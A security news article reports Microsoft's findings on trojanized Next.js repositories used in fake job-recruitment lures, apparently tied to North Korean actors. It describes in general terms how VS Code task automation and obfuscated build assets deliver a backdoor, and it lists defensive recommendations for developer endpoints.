Attackers are currently targeting developers through malicious Next.js repositories, aiming to perform remote code execution and establish a persistent command-and-control channel on infected machines. This campaign is believed to be linked to North Korea's fraudulent job recruitment scams.
Microsoft has raised concerns about this threat, which involves the distribution of malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender and the Microsoft Defender Security Research Team have identified several Trojanized repositories that provide various pathways for delivering a backdoor to compromise developer systems.
According to a recent blog post by the Microsoft security teams, "The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control."
While the researchers did not explicitly attribute the campaign to North Korea, they noted that the activity aligns with a broader group of threats that utilize job-themed lures to integrate into routine developer workflows. This cluster of attacks is associated with North Korea's Lazarus APT. The blog post also references earlier third-party research on North Korean APT activities related to Microsoft Visual Studio Code. For years, North Korean actors have persistently targeted developers by offering fake job opportunities, which often involve participating in sample development challenges that lead to the delivery of malicious code.
The blog post further highlights how a recruiting-themed "interview project" can seamlessly turn into a reliable method for remote code execution by blending into standard developer tasks, such as opening a repository, running a development server, or starting a backend.
The ultimate goal of this campaign is to execute code on developer systems that typically house valuable assets, including source code, environment secrets, and access to build or cloud resources. This activity emphasizes how developer workflows represent a primary attack surface for cyber espionage and other activities that could compromise the entire software supply chain.
Repositories Leading to Backdoor Activity
The researchers uncovered this campaign when Microsoft Defender flagged suspicious outbound connections from Node.js processes to infrastructure controlled by attackers, subsequently tracing the activity back to Next.js repositories exhibiting similar malicious behavior. Next.js is a widely used open-source web development framework maintained by the cloud software vendor Vercel.
The malicious repositories initiate one of two execution paths that establish a lightweight registration stage to identify the host and bootstrap code. These eventually lead to runtime retrieval and in-memory execution of attacker-controlled JavaScript, creating a persistent command-and-control connection for delivering additional payloads and exfiltrating data from compromised systems.
Some repositories exploit Visual Studio Code workspace automation by including a .vscode/tasks.json file configured to execute tasks automatically upon opening a trusted workspace. This triggers a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious code directly into development assets, allowing it to decode and fetch additional payloads when a developer runs typical build commands or launches a development server.
Developer Attacks Rage On
North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021, when security researchers identified the "Dream Jobs" campaign. This campaign involved sending fake job offers that linked to malicious web files. Over time, the attacks have evolved into more sophisticated social engineering tactics, luring developers into participating in fake development projects or recruitment challenges that deliver spyware and other forms of malware.
The recent discovery of weaponized Next.js repositories underscores the commitment of threat actors to target developers, not only to establish a spy channel but also to compromise the software supply chain as a whole. To defend against these threats, security operations teams and DevSecOps leaders are advised to treat developer workflows as a privileged attack surface. They should integrate IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs.
Organizations can enhance their defenses by enforcing strict trust policies for IDEs like Visual Studio Code, deploying attack surface reduction rules via Microsoft Defender for Endpoint to limit risky script execution behaviors, and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.
